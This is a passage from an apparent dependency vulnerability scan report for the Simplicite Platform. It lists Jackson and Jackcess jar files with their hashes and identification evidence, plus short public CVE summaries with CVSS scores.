MD5: 4e12f5c0713e5e1b38b74f8946d17c27
SHA1: 24ee9302d731e7c66e828049bb055ca710e29f03
SHA256: d624d55b3090ab733192041a758727b94a3136031660ab794998f3bd72b4c213
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackcess-encrypt High Vendor jar package name healthmarketscience Highest Vendor jar package name jackcess Highest Vendor Manifest bundle-docurl http://www.healthmarketscience.com Low Vendor Manifest bundle-symbolicname com.healthmarketscience.jackcess.encrypt Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid jackcess-encrypt Highest Vendor pom artifactid jackcess-encrypt Low Vendor pom developer email jahlborn@users.sf.net Low Vendor pom developer id jahlborn Medium Vendor pom developer name James Ahlborn Medium Vendor pom developer org Boomi, Inc. Medium Vendor pom groupid com.healthmarketscience.jackcess Highest Vendor pom name Jackcess Encrypt High Vendor pom parent-artifactid openhms-parent Low Vendor pom parent-groupid com.healthmarketscience Medium Vendor pom url http://jackcessencrypt.sf.net Highest Product file name jackcess-encrypt High Product jar package name healthmarketscience Highest Product jar package name jackcess Highest Product Manifest bundle-docurl http://www.healthmarketscience.com Low Product Manifest Bundle-Name Jackcess Encrypt Medium Product Manifest bundle-symbolicname com.healthmarketscience.jackcess.encrypt Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid jackcess-encrypt Highest Product pom developer email jahlborn@users.sf.net Low Product pom developer id jahlborn Low Product pom developer name James Ahlborn Low Product pom developer org Boomi, Inc. Low Product pom groupid com.healthmarketscience.jackcess Highest Product pom name Jackcess Encrypt High Product pom parent-artifactid openhms-parent Medium Product pom parent-groupid com.healthmarketscience Medium Product pom url http://jackcessencrypt.sf.net Medium Version file version 3.0.0 High Version Manifest Bundle-Version 3.0.0 High Version pom parent-version 3.0.0 Low Version pom version 3.0.0 Highest
jackson-annotations-2.10.5.jarDescription:
Core annotations used for value types, used by Jackson data binding package.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.10.5/jackson-annotations-2.10.5.jar
MD5: 2d98c7a68e9e99d98ea99dd9dc3639a4
SHA1: 33298de8da86f92f8ccd61ced214d3b16f8c531e
SHA256: 5ad94fbb2642df695892c4d6e2ab4c319821e5f9bfb7b920f1378de4f611417c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-annotations High Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-annotations Medium Vendor Manifest implementation-build-date 2020-07-21 01:31:06+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-annotations Highest Vendor pom artifactid jackson-annotations Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-annotations High Vendor pom parent-artifactid jackson-parent Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://github.com/FasterXML/jackson Highest Product file name jackson-annotations High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson Low Product Manifest Bundle-Name Jackson-annotations Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-annotations Medium Product Manifest implementation-build-date 2020-07-21 01:31:06+0000 Low Product Manifest Implementation-Title Jackson-annotations High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Jackson-annotations Medium Product pom artifactid jackson-annotations Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-annotations High Product pom parent-artifactid jackson-parent Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://github.com/FasterXML/jackson Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom parent-version 2.10.5 Low Version pom version 2.10.5 Highest
jackson-core-2.10.5.jarDescription:
Core Jackson processing abstractions (aka Streaming API), implementation for JSON License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.10.5/jackson-core-2.10.5.jar
MD5: 467e771df80da5f50fadb399f78f4ce1
SHA1: db2ba27938de7f2d478a97d6abcdaa17cbbd3cea
SHA256: 2656010d1e921ac69b76fc7e0c0f5a6b14aca62fa9603e78831e6148eb7c77ba
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-core High Vendor jar package name base Highest Vendor jar package name core Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name json Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-core Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-core Medium Vendor Manifest implementation-build-date 2020-07-21 01:40:55+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-core Highest Vendor pom artifactid jackson-core Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-core High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url FasterXML/jackson-core Highest Product file name jackson-core High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name base Highest Product jar package name core Highest Product jar package name fasterxml Highest Product jar package name filter Highest Product jar package name jackson Highest Product jar package name json Highest Product jar package name version Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-core Low Product Manifest Bundle-Name Jackson-core Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-core Medium Product Manifest implementation-build-date 2020-07-21 01:40:55+0000 Low Product Manifest Implementation-Title Jackson-core High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Jackson-core Medium Product pom artifactid jackson-core Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-core High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url FasterXML/jackson-core High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
jackson-core-asl-1.9.13.jarDescription:
Jackson is a high-performance JSON processor (parser, generator)
License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/codehaus/jackson/jackson-core-asl/1.9.13/jackson-core-asl-1.9.13.jar
MD5: 319c49a4304e3fa9fe3cd8dcfc009d37
SHA1: 3c304d70f42f832e0a86d45bd437f692129299a4
SHA256: 440a9cb5ca95b215f953d3a20a6b1a10da1f09b529a9ddea5f8a4905ddab4f5a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-core-asl High Vendor jar package name codehaus Highest Vendor jar package name jackson Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6 Low Vendor Manifest bundle-symbolicname jackson-core-asl Medium Vendor Manifest Implementation-Vendor http://fasterxml.com High Vendor Manifest specification-vendor http://www.ietf.org/rfc/rfc4627.txt Low Vendor pom artifactid jackson-core-asl Highest Vendor pom artifactid jackson-core-asl Low Vendor pom developer email tatu@fasterxml.com Low Vendor pom developer id cowtowncoder Medium Vendor pom developer name Tatu Saloranta Medium Vendor pom groupid org.codehaus.jackson Highest Vendor pom name Jackson High Vendor pom organization name FasterXML High Vendor pom organization url http://fasterxml.com Medium Vendor pom url http://jackson.codehaus.org Highest Product file name jackson-core-asl High Product jar package name codehaus Highest Product jar package name jackson Highest Product Manifest Bundle-Name Jackson JSON processor Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5, JavaSE-1.6 Low Product Manifest bundle-symbolicname jackson-core-asl Medium Product Manifest Implementation-Title Jackson JSON processor High Product Manifest specification-title JSON - JavaScript Object Notation Medium Product pom artifactid jackson-core-asl Highest Product pom developer email tatu@fasterxml.com Low Product pom developer id cowtowncoder Low Product pom developer name Tatu Saloranta Low Product pom groupid org.codehaus.jackson Highest Product pom name Jackson High Product pom organization name FasterXML Low Product pom organization url http://fasterxml.com Low Product pom url http://jackson.codehaus.org Medium Version file version 1.9.13 High Version Manifest Bundle-Version 1.9.13 High Version Manifest Implementation-Version 1.9.13 High Version pom version 1.9.13 Highest
jackson-databind-2.10.5.jarDescription:
General data-binding functionality for Jackson: works on core streaming API License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.10.5/jackson-databind-2.10.5.jar
MD5: 40a3ee2381813fdcfc6ad026e914ab0c
SHA1: 52414bbb464a2836c12649169930bed0c41e31a7
SHA256: 5e19fdaed7e0f2a37aa756d480879ae26926b9fc0d8270d78c4dcd5bf65a7a54
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-databind High Vendor jar package name databind Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-databind Medium Vendor Manifest implementation-build-date 2020-07-21 01:52:01+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-databind Highest Vendor pom artifactid jackson-databind Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name jackson-databind High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://github.com/FasterXML/jackson Highest Product file name jackson-databind High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name databind Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson Low Product Manifest Bundle-Name jackson-databind Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-databind Medium Product Manifest implementation-build-date 2020-07-21 01:52:01+0000 Low Product Manifest Implementation-Title jackson-databind High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title jackson-databind Medium Product pom artifactid jackson-databind Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name jackson-databind High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://github.com/FasterXML/jackson Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
CVE-2020-25649 suppress
A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2020-36518 suppress
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CWE-787 Out-of-bounds Write
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-46877 suppress
jackson-databind 2.10.x through 2.12.x before 2.12.6 and 2.13.x before 2.13.1 allows attackers to cause a denial of service (2 GB transient heap usage per read) in uncommon situations involving JsonNode JDK serialization. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-42003 suppress
In FasterXML jackson-databind before versions 2.13.4.1 and 2.12.17.1, resource exhaustion can occur because of a lack of a check in primitive value deserializers to avoid deep wrapper array nesting, when the UNWRAP_SINGLE_VALUE_ARRAYS feature is enabled. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-42004 suppress
In FasterXML jackson-databind before 2.13.4, resource exhaustion can occur because of a lack of a check in BeanDeserializer._deserializeFromArray to prevent use of deeply nested arrays. An application is vulnerable only with certain customized choices for deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-35116 suppress
jackson-databind through 2.15.2 allows attackers to cause a denial of service or other unspecified impact via a crafted object that uses cyclic dependencies. NOTE: the vendor's perspective is that this is not a valid vulnerability report, because the steps of constructing a cyclic data structure and trying to serialize it cannot be achieved by an external attacker. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (4.7) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
jackson-dataformat-csv-2.10.5.jarDescription:
Support for reading and writing CSV-encoded data via Jackson
abstractions.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-csv/2.10.5/jackson-dataformat-csv-2.10.5.jar
MD5: 6e3bc88152fdedb3207e760c5de00e9e
SHA1: 2fdba33036a74540f59ec21f956a3a5427e1c9db
SHA256: 573325172f7919399ab9a6f81d1c05d746cfc45e74bb211e01b2ecf92f96481a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-dataformat-csv High Vendor jar package name csv Highest Vendor jar package name dataformat Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-dataformats-text Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.dataformat.jackson-dataformat-csv Medium Vendor Manifest implementation-build-date 2020-07-21 03:31:04+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.dataformat Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-dataformat-csv Highest Vendor pom artifactid jackson-dataformat-csv Low Vendor pom groupid com.fasterxml.jackson.dataformat Highest Vendor pom name Jackson-dataformat-CSV High Vendor pom parent-artifactid jackson-dataformats-text Low Vendor pom url FasterXML/jackson-dataformats-text Highest Product file name jackson-dataformat-csv High Product jar package name csv Highest Product jar package name dataformat Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-dataformats-text Low Product Manifest Bundle-Name Jackson-dataformat-CSV Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.dataformat.jackson-dataformat-csv Medium Product Manifest implementation-build-date 2020-07-21 03:31:04+0000 Low Product Manifest Implementation-Title Jackson-dataformat-CSV High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson-dataformat-CSV Medium Product pom artifactid jackson-dataformat-csv Highest Product pom groupid com.fasterxml.jackson.dataformat Highest Product pom name Jackson-dataformat-CSV High Product pom parent-artifactid jackson-dataformats-text Medium Product pom url FasterXML/jackson-dataformats-text High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
Related Dependencies jackson-dataformat-xml-2.10.5.jarFile Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-xml/2.10.5/jackson-dataformat-xml-2.10.5.jar MD5: e936b010d951c5a5a8a2c48f74326431 SHA1: eb44e5de7ba75ef1b6e2c8caa09b0d5e153cb24f SHA256: e959cd5c81a35cf23cd8e55ee02af25da10f912dc0b3662e81d43c993b8e4471 pkg:maven/com.fasterxml.jackson.dataformat/jackson-dataformat-xml@2.10.5 jackson-dataformat-yaml-2.10.5.jarFile Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/dataformat/jackson-dataformat-yaml/2.10.5/jackson-dataformat-yaml-2.10.5.jar MD5: e38b555128a6e3d3d437df2b451061d5 SHA1: 86b10f913c64fc4927579e709fc8eb99e9a9e9ce SHA256: 4995abe8b7c943dd0532be3f890ee9ad2b3f6059cca22dc241d72ad337454951 pkg:maven/com.fasterxml.jackson.dataformat/jackson-dataformat-yaml@2.10.5 jackson-datatype-guava-2.10.5.jarDescription:
Add-on datatype-support module for Jackson (https://github.com/FasterXML/jackson) that handles
Guava (http://code.google.com/p/guava-libraries/) types (currently mostly just collection ones)
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-guava/2.10.5/jackson-datatype-guava-2.10.5.jar
MD5: d9451b1397aa6e288892c425d999bd55
SHA1: a8b0a978c18ab51006a0ef03ba2b2c156b92b1d8
SHA256: a42d52513f39a77a6481ab1e03b0f42874502c7b7c9dc5116819b1d78175d3fe
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-datatype-guava High Vendor jar package name datatype Highest Vendor jar package name fasterxml Highest Vendor jar package name guava Highest Vendor jar package name jackson Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-datatypes-collections Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-guava Medium Vendor Manifest implementation-build-date 2020-07-21 03:48:08+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.datatype Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-datatype-guava Highest Vendor pom artifactid jackson-datatype-guava Low Vendor pom groupid com.fasterxml.jackson.datatype Highest Vendor pom name Jackson datatype: Guava High Vendor pom parent-artifactid jackson-datatypes-collections Low Vendor pom url FasterXML/jackson-datatypes-collections Highest Product file name jackson-datatype-guava High Product jar package name datatype Highest Product jar package name fasterxml Highest Product jar package name guava Highest Product jar package name jackson Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-datatypes-collections Low Product Manifest Bundle-Name Jackson datatype: Guava Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-guava Medium Product Manifest implementation-build-date 2020-07-21 03:48:08+0000 Low Product Manifest Implementation-Title Jackson datatype: Guava High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson datatype: Guava Medium Product pom artifactid jackson-datatype-guava Highest Product pom groupid com.fasterxml.jackson.datatype Highest Product pom name Jackson datatype: Guava High Product pom parent-artifactid jackson-datatypes-collections Medium Product pom url FasterXML/jackson-datatypes-collections High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
jackson-datatype-joda-2.10.5.jarDescription:
Add-on module for Jackson (http://jackson.codehaus.org) to support
Joda (http://joda-time.sourceforge.net/) data types.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-joda/2.10.5/jackson-datatype-joda-2.10.5.jar
MD5: 87c36914caee49ec19b6deb12535bb1d
SHA1: b6ad58040fe4987b8abbdb7a22114382c8df5dda
SHA256: da4ee5119e4dd63c35bc3e27a712999d15d465144dc127f97278435491aff775
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-datatype-joda High Vendor jar package name datatype Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name joda Highest Vendor Manifest bundle-docurl http://wiki.fasterxml.com/JacksonModuleJoda Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-joda Medium Vendor Manifest implementation-build-date 2020-07-21 03:42:50+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.datatype Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-datatype-joda Highest Vendor pom artifactid jackson-datatype-joda Low Vendor pom groupid com.fasterxml.jackson.datatype Highest Vendor pom name Jackson-datatype-Joda High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://wiki.fasterxml.com/JacksonModuleJoda Highest Product file name jackson-datatype-joda High Product jar package name datatype Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name joda Highest Product Manifest bundle-docurl http://wiki.fasterxml.com/JacksonModuleJoda Low Product Manifest Bundle-Name Jackson-datatype-Joda Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.datatype.jackson-datatype-joda Medium Product Manifest implementation-build-date 2020-07-21 03:42:50+0000 Low Product Manifest Implementation-Title Jackson-datatype-Joda High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson-datatype-Joda Medium Product pom artifactid jackson-datatype-joda Highest Product pom groupid com.fasterxml.jackson.datatype Highest Product pom name Jackson-datatype-Joda High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://wiki.fasterxml.com/JacksonModuleJoda Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
jackson-jaxrs-base-2.10.5.jarDescription:
Pile of code that is shared by all Jackson-based JAX-RS
providers.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/jaxrs/jackson-jaxrs-base/2.10.5/jackson-jaxrs-base-2.10.5.jar
MD5: 5aa5208b0f40ed929cc1d5558d2219b2
SHA1: 2c0c330f121ca5396560a692113c8339f7aac9b5
SHA256: 98f27188fa2a72ef5d3f85fab6e6ca0e76bde1a58c9396cb1cf91028080435d6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-jaxrs-base High Vendor jar package name base Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name jaxrs Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-base Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.jaxrs.jackson-jaxrs-base Medium Vendor Manifest implementation-build-date 2020-07-21 03:57:12+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.jaxrs Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-jaxrs-base Highest Vendor pom artifactid jackson-jaxrs-base Low Vendor pom groupid com.fasterxml.jackson.jaxrs Highest Vendor pom name Jackson-JAXRS-base High Vendor pom parent-artifactid jackson-jaxrs-providers Low Product file name jackson-jaxrs-base High Product jar package name base Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name jaxrs Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-base Low Product Manifest Bundle-Name Jackson-JAXRS-base Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.jaxrs.jackson-jaxrs-base Medium Product Manifest implementation-build-date 2020-07-21 03:57:12+0000 Low Product Manifest Implementation-Title Jackson-JAXRS-base High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson-JAXRS-base Medium Product pom artifactid jackson-jaxrs-base Highest Product pom groupid com.fasterxml.jackson.jaxrs Highest Product pom name Jackson-JAXRS-base High Product pom parent-artifactid jackson-jaxrs-providers Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
jackson-jaxrs-json-provider-2.10.5.jarDescription:
Functionality to handle JSON input/output for JAX-RS implementations (like Jersey and RESTeasy) using standard Jackson data binding.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/jaxrs/jackson-jaxrs-json-provider/2.10.5/jackson-jaxrs-json-provider-2.10.5.jar
MD5: 523048dfe6878997218ea0b2cdb9af08
SHA1: e7be01e92f7ef9361118eef78f1974c5f778dd6a
SHA256: f0817100df27ded044dc9ac6effdb9961a3c37327c6c9262ed344218db048c7b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-jaxrs-json-provider High Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name jaxrs Highest Vendor jar package name json Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-json-provider Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.jaxrs.jackson-jaxrs-json-provider Medium Vendor Manifest implementation-build-date 2020-07-21 03:57:12+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.jaxrs Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-jaxrs-json-provider Highest Vendor pom artifactid jackson-jaxrs-json-provider Low Vendor pom groupid com.fasterxml.jackson.jaxrs Highest Vendor pom name Jackson-JAXRS-JSON High Vendor pom parent-artifactid jackson-jaxrs-providers Low Product file name jackson-jaxrs-json-provider High Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name jaxrs Highest Product jar package name json Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-json-provider Low Product Manifest Bundle-Name Jackson-JAXRS-JSON Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.jaxrs.jackson-jaxrs-json-provider Medium Product Manifest implementation-build-date 2020-07-21 03:57:12+0000 Low Product Manifest Implementation-Title Jackson-JAXRS-JSON High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson-JAXRS-JSON Medium Product pom artifactid jackson-jaxrs-json-provider Highest Product pom groupid com.fasterxml.jackson.jaxrs Highest Product pom name Jackson-JAXRS-JSON High Product pom parent-artifactid jackson-jaxrs-providers Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
jackson-jaxrs-xml-provider-2.10.5.jarDescription:
Functionality to handle XML input/output for JAX-RS implementations (like Jersey and RESTeasy) using standard Jackson data binding.
License:
